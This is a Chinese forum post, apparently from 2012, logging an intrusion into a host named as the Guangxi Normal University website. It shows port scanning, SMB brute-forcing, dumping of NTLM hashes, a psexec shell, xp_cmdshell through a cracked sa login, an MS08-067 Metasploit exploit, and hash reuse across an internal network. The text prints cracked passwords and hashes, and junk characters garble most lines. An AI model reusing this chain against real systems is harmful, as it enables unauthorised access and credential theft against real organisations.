广西师范网站http://202.103.242.241/
7 @4 |4 s' C+ w b& Y
8 b0 e' [. G5 _root@bt:~# nmap -sS -sV 202.103.242.241% p+ @2 k0 @7 [! y' o# t1 k( K
9 ?7 E' e9 a% {Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST5 t8 V2 N1 w) ^+ r# v
* R- g7 V1 i: D; S8 f( H6 H- wNmap scan report for bogon (202.103.242.241)
2 z0 q% u8 H7 V" n& D8 c3 n& c/ M$ L* t* ~
Host is up (0.00048s latency).
5 ]" T+ V P1 w( c0 B' z' ?' a8 ~6 w" ]1 S2 _% F; N
Not shown: 993 closed ports, _5 a* ]2 j1 f5 Z
2 P- g4 d% F! j7 t) ?4 J3 c- RPORT STATE SERVICE VERSION$ h" d$ U6 K* o" {
$ o, e0 h5 C1 u8 `
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)- O8 |1 V0 p2 w4 L" B) i
4 R9 [# y& p. F% w8 b& g/ u139/tcp open netbios-ssn: G z3 f& T0 u
- e, E6 q6 a" X) X* b$ }6 \
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds Z ^9 ]5 b9 v, R9 Z, I
9 a- E" o4 c% n! s$ m1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
% M9 J1 o. p# y& r1 K5 E5 P4 J9 X/ W( V8 w9 H( k. @
1026/tcp open msrpc Microsoft Windows RPC# @7 P' {* R$ T% ]
) Y! p6 t, U2 b5 p. E; s) @. m' R
3372/tcp open msdtc?2 i, n: W3 p% B* b( {% n2 C$ i% u
; d3 j- z& X2 j6 c- U( y1 b3389/tcp open ms-term-serv?
7 G! Z" i' @# _( U+ E: f% H, C: U/ x, c5 P$ u _
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :4 R" A( `3 i M; D; b3 Y
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
& m& x0 h. m$ Y
' ]9 r! N' g( S! wSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions, t+ i" _! E3 C" K& r9 v0 d
1 r1 O' t; J7 I5 F# }) U# D$ \
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
! G6 }2 ?- A* A; [/ Q! Z' u1 I. t. j+ J, q1 g9 K9 T- M
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO& T. s n8 j8 }' m
, B8 d) \$ y0 t6 b. U$ P
SF:ptions,6,”hO\n\x000Z”);
+ Y8 j$ s0 Q) {3 a0 l7 v+ z5 X6 R
& T: g/ d( \* b$ Z! JMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
; I2 X5 G# J+ `; y+ I% p. _
( E: E0 v" @8 hService Info: OS: Windows
; }6 J6 U% x* s0 D- d6 F! G$ E! |$ X
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
1 o* h) {, w. a8 D0 s0 M/ L( C5 L% w0 ^1 y1 Q# A
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds% r3 s6 d7 p2 K4 K; A" N. Q0 ^3 n
" U4 u/ g7 u7 T6 d
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本
) f( g9 j7 A U H9 H. O' @8 N; {* }9 r+ {7 _
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
7 o' F, v9 r T6 U, U# h1 e
' h" W# ^8 P: Q& q0 ]6 y8 r-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse" ^' ]6 `4 E7 C! S
* ?% ]! x3 Y" w9 I% \2 O, ^-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse+ Z; w1 a V9 i
7 E N3 @6 t, o8 K: C
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
! W% \4 j* N) J- f! J, h
+ T5 J4 l8 }5 c-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse5 j" k; k L, L$ q- {4 f
: W& m$ t* }5 E
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse- m A6 L6 V5 G3 s0 C
7 a2 U0 X: d& H) W* }4 R-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse& d& {) S- e4 A5 S- c/ j* k0 r# Y
" s8 q- z. f3 E$ ?" t# S. [-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
/ \, E# I- |$ l% u$ A% \! z" X) a' z) y( h% u k* D
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
) p" j! h7 R- n( `+ s7 h
2 I2 i+ y ]3 n# v-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
6 ]% W9 @, ]# S& C/ M9 O' {
$ t6 ^, ]0 u+ k9 |6 B-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse7 z- w9 U" P. u7 C, q& X
j! _; a/ A9 ?-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
& u; e( f6 a T( w% {% q" x" n- e
2 X, j! k g8 B" h, U% }-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse
+ R3 x4 h! L/ ?# m- K. O, w; k$ M2 _7 f& p9 c" r
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
7 ?4 ~5 ]7 Q6 B- ?
! a2 j+ _3 ^8 n; ~9 s7 F-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse" E5 [& Z5 N8 f V# N. C
4 o, }, o y1 zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 5 E3 j! G- W& ^1 Z. S8 U' j
. \$ [5 z) \9 Y+ b
//此乃使用脚本扫描远程机器所存在的账户名( m" H3 I! w) O0 `+ o! E9 w
. \2 C4 c/ v" m- q* S/ t
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST0 D% v* Z3 B1 x# Z7 C9 y) }
* S$ w/ H* {& pNmap scan report for bogon (202.103.242.241)- M- r# _$ o) l# I
6 f5 N7 q6 J' I0 Z C( SHost is up (0.00038s latency).
- m c- u% K! k w, }1 H8 x$ G" J6 }- {6 d/ y; R9 Z5 l8 F! V9 K
Not shown: 993 closed ports
) H7 j9 V# W, H" O0 S2 F- k( f* j# z$ \! ~( d4 \
PORT STATE SERVICE6 i! M% E& m Z
1 n/ S! U* X6 i/ H0 K }9 I135/tcp open msrpc
$ X: u; O9 s& ^- i0 F; l7 @ h# x A/ |" {5 t% Z4 H" u0 p8 W( r9 H& e
139/tcp open netbios-ssn! l# ~5 }, P* K
" r/ V9 M6 e3 T8 G: |% z
445/tcp open microsoft-ds
3 q8 K1 n% L; X3 J' k
" W+ u3 o3 d) X o; v: ^1025/tcp open NFS-or-IIS
, s$ @5 v' ~! }- M) W8 {# C) [; S2 j2 I2 z/ y
1026/tcp open LSA-or-nterm5 o! T2 T0 a. [1 ~/ |. S3 E5 P, Y$ @
. @+ U( @! ~# R7 E! e1 Z3372/tcp open msdtc4 e3 ~; E' k. _, R
& ]1 B- r, G Y0 R) R: F5 h! ?5 Q
3389/tcp open ms-term-serv
1 c$ C* ]+ z5 b1 j* O
5 J. s0 P% K) K: n. iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 s" c7 M; C$ @, e w6 D9 o$ A# Y
2 g. O) V2 [) q( r% q: v& R
Host script results:
' E# | f8 N& g+ o% g; U: n
; v* L" J/ R% P( B| smb-enum-users:( |) i3 m! h) L- V. u9 @8 ~
3 O- o+ u( H- W, {- X& C) i* m|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果4 m3 Q) x P" l8 w( u
& c* {& L! Z/ k9 j0 g7 S
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds5 \- J) c0 P" Y+ T9 ?
3 ^/ c1 Z- l( c( c* Q/ qroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 " U& c9 a/ b6 h. c1 r% ]
5 p- m q0 q8 ^" X3 k3 p& L//查看共享
1 g5 n5 d% _7 U ` H
. X: \5 l* P1 u2 B2 s3 cStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST1 m: F; A8 q% ]* b: u' e# k
0 i0 S% ?" D7 s s# tNmap scan report for bogon (202.103.242.241)
7 x3 D0 {* W1 b" [5 k
3 A8 k. q* ]: f( vHost is up (0.00035s latency).
$ U6 t8 f. {0 |3 O5 P
* j4 O/ u: g9 iNot shown: 993 closed ports
& M2 s- E3 V# M) n5 g( Q
# J; u( j2 u# z" y9 U, P. kPORT STATE SERVICE4 r& q# Y0 j9 M5 Y' {5 r% F) g% w
" I7 @1 T% l4 d% Q9 }6 z. m
135/tcp open msrpc
3 ]9 n" r5 u$ z% w! J5 r: ^0 ?/ Q* Y' `" O6 }& s) a
139/tcp open netbios-ssn7 F* M5 V' W# ~7 V$ U
0 I0 w3 O- h' ?9 V `6 h3 V
445/tcp open microsoft-ds1 M6 E; W! d; s1 ~1 Y
! U" R. k9 `, w; G1 c9 ?1025/tcp open NFS-or-IIS) [/ c6 K+ a4 [. a G) Q, D6 ^
4 N. ^3 ?: U# `* j1026/tcp open LSA-or-nterm) J, I2 j9 X: Q7 a* s+ f+ c
3 _0 i! H4 {; o" u3 L/ n M
3372/tcp open msdtc4 w7 K) h# a7 P3 n1 i
5 V; @) D$ O9 B3 ^$ a% J W& u1 E0 M
3389/tcp open ms-term-serv
" y7 |5 E# l/ A/ {" L5 y
. ~% D+ e6 b$ S* A" O" cMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
4 L. k* o+ H) w6 i7 r7 w& z5 ?, j; d
Host script results:/ T5 K! l! O/ l3 D# y
* g7 ?& x& c- @% D
| smb-enum-shares:
: O& p0 M% e& w% ^6 O
3 f) M3 u8 @8 U9 p| ADMIN$ \. f9 a% X# T" n# r0 X
. s4 J/ ~& `6 s& D; J' E: N6 l: c$ P
| Anonymous access: <none>
' g9 _- ~4 O# `* y; j1 l2 S4 z h; V/ B
| C$
5 D6 ^& B! i- @; x8 T, H
1 I4 Z+ D3 u- O| Anonymous access: <none>' \' N* J/ \7 `9 o( V
. I# K4 \5 _1 f3 c# c! u' n, k| IPC$
" Q* I( p) j; B/ ]" k1 u/ S6 r$ k% P3 i. r$ o+ |7 E
|_ Anonymous access: READ6 _* m6 |: i4 B" D' b( z3 \; r, [; M
. }( h% b! {! D, {, z: j X7 N
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds( o# N; J3 z- b0 B* y
1 f7 N* r6 n" e8 r& L; O" S8 N
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 % L; U3 @* @6 q& Q0 B0 h& s
% _6 [( `' E* `$ Z c6 Q//获取用户密码
0 o) ^2 O# ]1 t( W6 s! B% Z- Q( }
: D. `0 ^' R8 t W/ |6 N# ZStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
' Z6 u) f# ]+ ?- M9 E8 U% t) C; ~$ j: W/ T
Nmap scan report for bogon (202.103.242.2418)
- N$ V: X) I3 S; E! Y6 K" f3 M
) [( y6 p8 E) o1 w. ^- m; S$ qHost is up (0.00041s latency).& \) S8 V8 X9 f* d1 B/ }" o
$ }/ h( {. g& e" {" w$ YNot shown: 993 closed ports9 G2 W7 X% z7 i
; J6 I9 f4 Y9 R, A4 \8 o
PORT STATE SERVICE7 L; M' E4 F- D
. _- p W+ `* l7 d' s4 B) d9 S135/tcp open msrpc
5 N1 t2 K9 c5 Y% M8 Y5 U0 j+ f% T7 i4 U' s& B! v2 w% t- a. P
139/tcp open netbios-ssn
" E4 Y+ G! k1 v" i* K; i5 L4 k! ` ~5 V
445/tcp open microsoft-ds
! b7 ?, J. _ K5 Q8 W( C, V* G, {! [. ~9 T8 P5 C) ? R
1025/tcp open NFS-or-IIS
& I( T- K4 p+ {9 \' D( P f6 Y0 u9 i4 v4 j. d
1026/tcp open LSA-or-nterm0 S$ b' c8 C" q
7 O1 s6 I7 q1 r3372/tcp open msdtc
' V6 h( {! ?& ~& ?8 F
; a% C8 n% Q' y" n) w ?: [9 j8 S3389/tcp open ms-term-serv
( a, x$ T- }( i" j6 D! C0 c$ y/ p U& _1 B6 U8 G' ], E$ l
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)3 i" _" n8 ~$ h# K9 r+ Z8 Z. g9 k
6 j G2 X$ y" R' @! A9 }
Host script results:+ |+ S. H- r8 b+ F% U- ?. K8 q8 ^
" Z3 L( |" |8 l: v V' g7 S| smb-brute:& z1 o' A0 `( n5 ~! q
% i0 d. H# T+ F. [/ W
administrator:<blank> => Login was successful3 H- I4 ^- V% T) V% t% Y5 H+ T
) M$ b7 e* Y$ w4 j, h|_ test:123456 => Login was successful
5 N8 h0 G' U6 n0 U; _5 g$ l. |- S# \1 i- h+ o1 K/ V. O1 q" S
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
{" J! p* O7 l5 p# c5 J8 ~
% ?# G4 o1 X5 `4 o+ G: g& Rroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
7 N2 G7 v" `8 W/ l4 d5 e& a- h, \, o$ x: ~7 T( X
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
' `# G, I2 u" ~, n/ n, t9 e' L8 T2 l ]
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
- |2 m) d# u' i2 l: R; T* a: r/ ~% t3 l" H7 z
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1399 _2 G8 |- H& O, ^ u- R4 T2 q* F* M* J/ _
( Q" u; D$ X3 d' ]8 O* w4 L g
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
% z o ?7 x" G* ^8 ^! q+ M: ^* E* o! m
Nmap scan report for bogon (202.103.242.241)0 a u/ C5 B5 v l8 H
2 W5 U* F9 Z, K) V) y: }Host is up (0.0012s latency).8 L- a- s" S E/ u
* @3 x$ F& t; I/ FPORT STATE SERVICE
: q9 u/ ^' k7 W; I( u9 G/ V1 \7 \- K+ M
135/tcp open msrpc2 L8 s2 l+ L7 S) U1 R
! }8 F5 t4 U3 L: Q7 H0 }2 Y4 M9 a) u) l139/tcp open netbios-ssn
3 c+ i) s) w9 Q! b3 B% E! c9 K2 I0 j, t/ }
445/tcp open microsoft-ds
$ F2 j( I# U' C+ e) I" ?
$ ?+ n+ h# u) n. h+ d3 PMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
8 V; |) Z, _4 Y) R% G: I$ A& j9 X4 |4 A! m+ R$ D9 ]5 h/ A$ X1 L
Host script results:& v) Y4 G0 g0 K; I
) @$ k) x7 S. ]: n z4 V" t. z" _| smb-pwdump:. q& ^2 `) o! B9 x. X% a; C
6 ?: J, o# T4 l2 j| Administrator:500 => NO PASSWORD*********************:NO PASSWORD********************** h# z# A, m! J R
" {9 w2 n1 I6 j/ W
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
. ~; B) X7 D1 @* S; j4 p- p1 j
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
; _( i& c: v2 _: R1 y4 Y ?7 Y8 Y3 c+ H# V7 L; |% v
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
) t8 Z$ j9 N/ y, u. K& O% B6 e4 k5 h0 a4 M# f
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds J% ~2 K9 S9 J# e' h( U3 x
) F/ o- q! Z7 zC:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
! s c* r" X8 v! a& W
3 r9 ~1 B) J/ N-p 123456 -e cmd.exe* [+ H$ `2 l y; M
0 l2 I4 F. D0 I) ePsExec v1.55 – Execute processes remotely
" y% [- @( i ] B* T3 Y
1 f$ F8 Z* l2 Q8 u: F% P( HCopyright (C) 2001-2004 Mark Russinovich7 v9 [/ h2 O2 U1 l8 T$ S
) x0 J! s) q3 @" c3 B" i1 s
Sysinternals – www.sysinternals.com
7 y4 Q; g& J1 p$ Y! A; T' x+ M2 i7 F$ r1 f
Microsoft Windows 2000 [Version 5.00.2195]( |# s# K, H$ v' Y' l# y$ M- S
3 S- D- n# m' y7 @/ L(C) 版权所有 1985-2000 Microsoft Corp.
& i$ W; n! R7 p. E: C* A' h# M# j2 x/ X3 g. d
C:\WINNT\system32>ipconfig
" D2 v0 q" R+ v/ j0 } c
7 [% l# Y3 C5 [Windows 2000 IP Configuration
6 R* u6 b/ T' s
+ J0 y* q3 l) j/ wEthernet adapter 本地连接:
. P& B* J4 P V" F6 u8 P* p8 k
( [+ q# R2 E. G$ K' g3 eConnection-specific DNS Suffix . :
) H* ~& Z+ I/ p; |* y
% o) |+ L9 z2 o5 Y0 Z% {! aIP Address. . . . . . . . . . . . : 202.103.242.241
) i) r/ V5 k I( e7 v/ d) I* @" {
- v% \1 R$ n# Y D& N. U- f+ ^+ d9 M7 ySubnet Mask . . . . . . . . . . . : 255.255.255.0
/ a+ M6 u4 _+ h4 r9 G
. b* w# X; h/ n2 B5 S- F2 G4 }Default Gateway . . . . . . . . . : 202.103.1.1
. y% c" E8 x% }# d
1 F6 m; N# `5 f0 B' \; C3 nC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
9 f5 u9 x( [# O) m3 x1 i6 Y
$ g& j+ _4 T# Q" u! i3 droot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
; q& H# {: d9 Y: s9 \2 m+ M9 G9 [+ ` q) {( c
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
; \$ _6 I1 w, P( j4 `1 Y. F1 F, b" K
Nmap scan report for bogon (202.103.242.241)
8 q* L& q5 G, \; i- F. G' B1 c- n6 h# [- |5 Q2 j3 Q8 J
Host is up (0.00046s latency)., \, T% c3 K b+ ?
' ]4 l) i( ~3 M
Not shown: 993 closed ports2 C3 e4 c' \9 q$ T* ~
8 u6 ^# l+ ?# ?; G" Z$ W' }
PORT STATE SERVICE, p8 H5 F+ e& }& q2 M9 h2 @' B2 S
3 _0 X* a& g, j, ` N$ I135/tcp open msrpc
- ]3 x4 c9 P! r/ b. U" ]& d2 j9 c" Q5 {& e6 n3 H: @
139/tcp open netbios-ssn) x5 t l* V b) D% @; x
' r+ Y& {5 ]* A445/tcp open microsoft-ds
6 m2 j8 E+ |3 Y1 F# J6 C6 ]. b* Y
1025/tcp open NFS-or-IIS
/ o. F4 d2 P; p5 j. S f$ b) Q- \7 ?( L4 u f& X/ m
1026/tcp open LSA-or-nterm0 D" B9 L& i+ e' p8 H' L
: N% U: r2 ~3 _) Y3372/tcp open msdtc
( K& l1 e) T2 {% ^5 M; r- E. S% _( W8 D
3389/tcp open ms-term-serv& k, D4 T7 I2 h b7 K
' k! |0 t/ J+ o+ @2 x2 J. fMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)8 K8 L+ a9 u4 V0 T
2 }: B' ?6 [6 Q: ZHost script results:
& d/ N6 C0 ~4 V# Z
5 I# Y/ E8 V# J: }: x- {+ N4 C| smb-check-vulns:; Q# N8 d# y+ G+ ^% r3 H4 m
6 T" \, o% H5 K; f! ~. V: A|_ MS08-067: VULNERABLE4 h1 o7 A+ _' g
8 c# z' b ]6 U! l8 ]
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds) w8 H$ }. n- |) u% i
( _' ~/ i" R% Z( O. G# @root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出
/ @+ H1 j- }9 G
{2 w$ H/ L) ]: n$ u5 H3 f4 Dmsf > search ms08
8 `) |/ C( y7 y# O/ ]& h5 | s# G3 D
msf > use exploit/windows/smb/ms08_067_netapi
; t7 y, i' S: }# Y$ y5 }# k
' n' \) ~6 X4 A; fmsf exploit(ms08_067_netapi) > show options$ @/ A7 m5 E' u. P1 q$ e
& i- R6 m/ ~; m5 Imsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
( B7 T4 K+ K& K. G, K
3 g- s) [6 f- N3 W! c- g1 c5 h" hmsf exploit(ms08_067_netapi) > show payloads
& \% J- K. p* H% e
" j2 n$ w% ^; |6 dmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp* i8 v8 ~! }# m; ?9 ` ]! e
3 W0 Q4 h& J# L0 J) o5 c5 D/ qmsf exploit(ms08_067_netapi) > exploit
4 R' @& _. g9 |6 I d" J- Q+ M+ i0 n1 {
meterpreter ># r' F7 f: B: N5 h. V# T2 h
k3 d |4 Z% h RBackground session 2? [y/N] (ctrl+z)1 Q2 G3 l# c9 b& e, |* q
; G! u' v+ q+ T. i0 S+ n" N% A
msf exploit(ms08_067_netapi) > sessions -l7 }+ d. a* b& E: g( ]) R9 o* Y0 J, U
% L+ m m) @( N% proot@bt:/usr/local/share/nmap/scripts# vim usernames.txt
' F2 N" q+ Y( W3 Y- ]
* [$ i5 H* Y1 y% C" ~ \test
' j/ R( s* F! [2 O- T5 x+ }4 Y+ _, W2 S
% _' G$ P* M! J9 C6 w1 gadministrator
! p1 ?0 ~/ O% L) [$ i6 x
3 L% r* t4 ^6 v* ^5 J) proot@bt:/usr/local/share/nmap/scripts# vim password.txt
1 k" K6 A' G( r2 \( P% V, J9 H2 f( L
44EFCE164AB921CAAAD3B435B51404EE/ Z; n( J" I" G, `7 ]& |
2 ^. Q- x2 c5 A" z1 L2 m
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 7 A% O5 I7 x8 v9 O! I$ a2 t
7 K: u. R! I# l4 W
//利用用户名跟获取的hash尝试对整段内网进行登录, `/ @0 e8 o6 M5 V" S) G
: r6 y- ^. \; s0 p; u3 eNmap scan report for 192.168.1.105# ?5 F/ `( R; B J
, U# U5 J8 B1 L1 D
Host is up (0.00088s latency).! o- |+ i# |4 Z
9 |& O( Q4 b! s- p% p
Not shown: 993 closed ports3 t. ?$ @/ _: O8 [$ \
9 V8 z( [% i* f" T1 ]; n% P" zPORT STATE SERVICE2 h- m1 v: o. ^* V! w' _
; k0 h) I1 I& J1 _. p7 ]135/tcp open msrpc
2 C1 I: H6 b2 l; a7 |3 S g4 H
( c N, c9 y3 {" |! p, P139/tcp open netbios-ssn
! I6 k# _5 b! X& Q4 b8 ]4 f5 y6 X1 _5 Y" h1 d
445/tcp open microsoft-ds
7 O' ]) y' b. A" g4 r3 _- c! {5 k0 A
& E5 C C, U* y2 N/ b. w" Y" V1025/tcp open NFS-or-IIS1 R! g! Y+ W/ a# s! v, Z
. P- v7 d) R6 w5 o/ X
1026/tcp open LSA-or-nterm1 N" b' G- Z% T% y
9 c/ H. j! k; j9 O! z- z$ D( a) Y4 V5 x3372/tcp open msdtc
' s$ V, G# O7 N, u7 l y; Q# u+ M* E$ s( O0 t2 w
3389/tcp open ms-term-serv9 n9 r# P2 r! k+ a& a
, x3 `$ b0 j( y. R+ a: ^
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 ~4 z4 I. b* S3 e' g
. C! x; T4 q& a u+ q& l
Host script results:
& n" P, ]/ v0 f6 X/ g- M
" b) o3 D/ ?# I+ X! Q+ Y5 D| smb-brute:( r/ T+ q! Y1 |9 l7 ]+ F& l2 q7 j6 o
A+ M' L' ]( L; g: U" g+ u|_ administrator:<blank> => Login was successful! V' l8 }; h- @) V$ r, F
" z k5 x3 F8 u: c0 ?
攻击成功,一个简单的msf+nmap攻击~~·
* A7 A. K4 j7 F% H1 Q: w- R8 [+ H; Z. I% h' D9 i
|
发表于 2012-12-4 12:46:42
收藏
支持
反对